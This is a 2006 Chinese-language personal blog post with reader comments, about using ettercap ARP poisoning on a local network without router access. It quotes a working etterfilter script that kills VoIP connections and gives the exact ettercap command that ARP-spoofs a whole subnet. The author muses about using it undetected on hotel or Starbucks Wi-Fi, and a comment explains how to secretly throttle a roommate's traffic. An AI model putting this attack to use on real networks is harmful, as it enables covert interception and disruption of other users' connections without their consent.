關於我自己

我的相片
New York, New York, United States
我叫江奕賢啦

2006年7月8日

不需要Router or Firewall權限 也可以直接檔掉某網路功能

本來想找個管理網路的軟體(遠端管理某台機器的某軟體使用的頻寬等)
後來想說 那我改改我的router好了
再後來 想說 乾脆用ARP Poison直接把router管理權搶過來算了
所以朝這方向研究了一下 看到這篇
發現用手上免費的的etterfilter和ettercap就可以達成了



>> # blockvoip.filter
>> # Proof of concept VoIP blocking filter
>> # By Natas
>> # Instructions:
>> # Run "etterfilter blockvoip.filter -o blockvoip.ef"
>> # Then "ettercap -T -q -F blockvoip.ef -M ARP /10.1.1.1-254/ //"
>>
>> if (ip.proto == UDP && udp.src == 4569) {
>> msg("Killed Attempted IAX2 Connection.\n");
>> drop();
>> kill();
>> }
>>
>> if (ip.proto == UDP && udp.src == 5060) {
>> msg("Killed Attempted SIP Connection.\n");
>> drop();
>> kill();
>> }
>>
>> if (ip.proto == UDP && udp.src == 2427) {
>> msg("Killed Attempted MGCP Connection.\n");
>> drop();
>> kill();
>> }
>>
>> # Don't know to much about MGCP Call Agent traffic but # I
>> put it in here for the hell of it.
>> if (ip.proto == UDP && udp.src == 2727) {
>> msg("Killed Attempted MGCP Call Agent Connection.\n");
>> drop();
>> kill();
>> }



只要把drop改成random照機率drop 或者delay一下再丟出去 應該就差不多了
嗯 用這招真是超方便 要是讓我早個十年發現...
算了 那時候宿網本來就歸我管 不需要用到ARP...
嗯 到Hotel或Starbucks用免費網路的時候說不定有用 哈哈 神不知鬼不覺的...
不過 我從不做這種犯罪的事情...
算了 還是記在我的筆記本就好了...

2 則留言:

sunshime 提到...

HI:我是一位初學者,對您所發表的文章很有興趣,但卻看不懂,若可以的話,可否再寫清楚一點,謝謝您的提供!!

Yih-Shien 提到...

簡單的說 就是
平常 同一個區域網路的頻寬是大家共用的
比如說 宿舍裡 你的室友用力在p2p或download
導致你的網路速度也變慢

如果我用這招的話
我就可以直接幫他限制速度
讓我的網路速度快一點

原理上是這樣的:
我的電腦會告訴他的電腦說我的電腦是才是真正的router
所以他的所有網路訊息都會先通過我的電腦
我的電腦會依據我設定的規定
看要不要幫他把網路資料傳出去
或者傳慢一點
我當然不會限制我自己的網路速度
所以我當然就最快啦